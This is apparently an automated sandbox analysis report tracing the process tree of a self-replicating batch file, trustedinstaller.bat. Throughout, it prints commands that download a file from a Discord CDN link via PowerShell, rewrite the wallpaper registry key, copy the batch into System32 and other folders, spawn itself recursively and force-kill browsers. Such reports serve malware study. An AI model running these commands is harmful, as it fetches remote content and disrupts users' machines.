PID 2724 wrote to memory of 1616	2724	cmd.exe	44
PID 2724 wrote to memory of 1616	2724	cmd.exe	44
PID 2724 wrote to memory of 1616	2724	cmd.exe	44
PID 2780 wrote to memory of 3068	2780	cmd.exe	141
PID 2780 wrote to memory of 3068	2780	cmd.exe	141
PID 2780 wrote to memory of 3068	2780	cmd.exe	141
PID 2820 wrote to memory of 2296	2820	cmd.exe	46
PID 2820 wrote to memory of 2296	2820	cmd.exe	46
PID 2820 wrote to memory of 2296	2820	cmd.exe	46
PID 2168 wrote to memory of 1448	2168	cmd.exe	347
PID 2168 wrote to memory of 1448	2168	cmd.exe	347
PID 2168 wrote to memory of 1448	2168	cmd.exe	347
PID 2820 wrote to memory of 296	2820	cmd.exe	49
PID 2820 wrote to memory of 296	2820	cmd.exe	49
PID 2820 wrote to memory of 296	2820	cmd.exe	49
PID 2168 wrote to memory of 2584	2168	cmd.exe	317
PID 2168 wrote to memory of 2584	2168	cmd.exe	317
PID 2168 wrote to memory of 2584	2168	cmd.exe	317
PID 2812 wrote to memory of 1092	2812	cmd.exe	181
PID 2812 wrote to memory of 1092	2812	cmd.exe	181
PID 2812 wrote to memory of 1092	2812	cmd.exe	181
PID 2820 wrote to memory of 2432	2820	cmd.exe	105
PID 2820 wrote to memory of 2432	2820	cmd.exe	105
PID 2820 wrote to memory of 2432	2820	cmd.exe	105
PID 2168 wrote to memory of 2264	2168	cmd.exe	53

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\trustedinstaller.bat"
1⤵
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:2812
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2348
- C:\Windows\system32\reg.exe
  reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
  2⤵
  - Sets desktop wallpaper using registry
  PID:2816
- C:\Windows\system32\rundll32.exe
  RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
  2⤵
  PID:2212
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K "C:\Program Files\BatchFile\trustedinstaller.bat"
  2⤵
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Suspicious use of WriteProcessMemory
  PID:2168
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2652
- - C:\Windows\system32\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
    3⤵
    - Sets desktop wallpaper using registry
    PID:1448
- - C:\Windows\system32\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:2584
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Program Files\BatchFile\trustedinstaller.bat"
    3⤵
    - Drops file in System32 directory
    - Drops file in Windows directory
    PID:2264
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2476
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
      4⤵
      Sets desktop wallpaper using registry
      PID:3676
  - - C:\Windows\system32\rundll32.exe
      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
      4⤵
      PID:3440
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Program Files\BatchFile\trustedinstaller.bat"
      4⤵
      PID:4808
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:5220
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Windows\System32\trustedinstaller.bat"
      4⤵
      PID:4336
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:4220
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\BatchFile\trustedinstaller.bat"
      4⤵
      PID:4520
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:5400
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\PerfLogs\trustedinstaller.bat"
      4⤵
      PID:4228
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:5204
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
        5⤵
        
        PID:5992
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Windows\trustedinstaller.bat"
      4⤵
      PID:5620
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:3228
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\trustedinstaller.bat"
      4⤵
      PID:5624
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:5196
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
        5⤵
        
        PID:1792
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "chrome.exe"
      4⤵
      Kills process with taskkill
      PID:5632
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "firefox.exe"
      4⤵
      Kills process with taskkill
      PID:5900
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Windows\System32\trustedinstaller.bat"
    3⤵
    - Drops file in Program Files directory
    - Drops file in Windows directory
    PID:2468
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:792
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
      4⤵
      Sets desktop wallpaper using registry
      PID:3460
  - - C:\Windows\system32\rundll32.exe
      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
      4⤵
      PID:2636
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Program Files\BatchFile\trustedinstaller.bat"
      4⤵
      PID:2524
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2880
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:5984
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:4304
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Program Files\BatchFile\trustedinstaller.bat"
        5⤵
        
        PID:4072
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        6⤵
        
        PID:6384
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Windows\System32\trustedinstaller.bat"
        5⤵
        
        PID:3668
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\BatchFile\trustedinstaller.bat"
        5⤵
        
        PID:1948
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        6⤵
        
        PID:10008
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\PerfLogs\trustedinstaller.bat"
        5⤵
        
        PID:1616
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        6⤵
        
        PID:2160
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Windows\trustedinstaller.bat"
        5⤵
        
        PID:4260
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        6⤵
        
        PID:3664
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Users\trustedinstaller.bat"
        5⤵
        
        PID:6132
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6188
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "chrome.exe"
        5⤵
        Kills process with taskkill
        
        PID:4460
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Windows\System32\trustedinstaller.bat"
      4⤵
      PID:2756
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2824
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:5092
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:6856
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Program Files\BatchFile\trustedinstaller.bat"
        5⤵
        
        PID:9308
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Windows\System32\trustedinstaller.bat"
        5⤵
        
        PID:9316
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\BatchFile\trustedinstaller.bat"
        5⤵
        
        PID:9336
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\PerfLogs\trustedinstaller.bat"
        5⤵
        
        PID:9344
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Windows\trustedinstaller.bat"
        5⤵
        
        PID:9352
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Users\trustedinstaller.bat"
        5⤵
        
        PID:9360
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "chrome.exe"
        5⤵
        
        PID:9368
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\BatchFile\trustedinstaller.bat"
      4⤵
      PID:2852
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2968
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:5164
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:6816
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\PerfLogs\trustedinstaller.bat"
      4⤵
      PID:2088
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2464
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:2676
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:6276
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Program Files\BatchFile\trustedinstaller.bat"
        5⤵
        
        PID:6280
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        6⤵
        
        PID:8028
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Windows\System32\trustedinstaller.bat"
        5⤵
        
        PID:6948
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        6⤵
        
        PID:8116
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\BatchFile\trustedinstaller.bat"
        5⤵
        
        PID:6932
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\PerfLogs\trustedinstaller.bat"
        5⤵
        
        PID:7148
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        6⤵
        
        PID:8108
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Windows\trustedinstaller.bat"
        5⤵
        
        PID:6800
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:8008
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Users\trustedinstaller.bat"
        5⤵
        
        PID:7088
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        6⤵
        
        PID:3296
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "chrome.exe"
        5⤵
        
        PID:6848
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Windows\trustedinstaller.bat"
      4⤵
      PID:2964
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1368
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:5368
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:2544
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Program Files\BatchFile\trustedinstaller.bat"
        5⤵
        
        PID:9472
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Windows\System32\trustedinstaller.bat"
        5⤵
        
        PID:9504
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\BatchFile\trustedinstaller.bat"
        5⤵
        
        PID:9536
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\PerfLogs\trustedinstaller.bat"
        5⤵
        
        PID:9568
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Windows\trustedinstaller.bat"
        5⤵
        
        PID:9600
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Users\trustedinstaller.bat"
        5⤵
        
        PID:9624
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "chrome.exe"
        5⤵
        
        PID:9656
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\trustedinstaller.bat"
      4⤵
      PID:2552
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1364
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:3672
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:6888
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "chrome.exe"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2540
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "firefox.exe"
      4⤵
      PID:6056
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "msedge.exe"
      4⤵
      Kills process with taskkill
      PID:3624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\BatchFile\trustedinstaller.bat"
    3⤵
    PID:2460
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:824
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
      4⤵
      Sets desktop wallpaper using registry
      PID:1668
  - - C:\Windows\system32\rundll32.exe
      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
      4⤵
      PID:5452
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\PerfLogs\trustedinstaller.bat"
    3⤵
    - Drops file in System32 directory
    - Drops file in Program Files directory
    - Drops file in Windows directory
    PID:2440
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1180
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
      4⤵
      Sets desktop wallpaper using registry
      PID:440
  - - C:\Windows\system32\rundll32.exe
      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
      4⤵
      PID:2420
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Program Files\BatchFile\trustedinstaller.bat"
      4⤵
      PID:3684
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:548
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:6048
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:6756
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Program Files\BatchFile\trustedinstaller.bat"
        5⤵
        
        PID:6660
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:8072
    - - C:\Windows\system32\cmd.exe
        
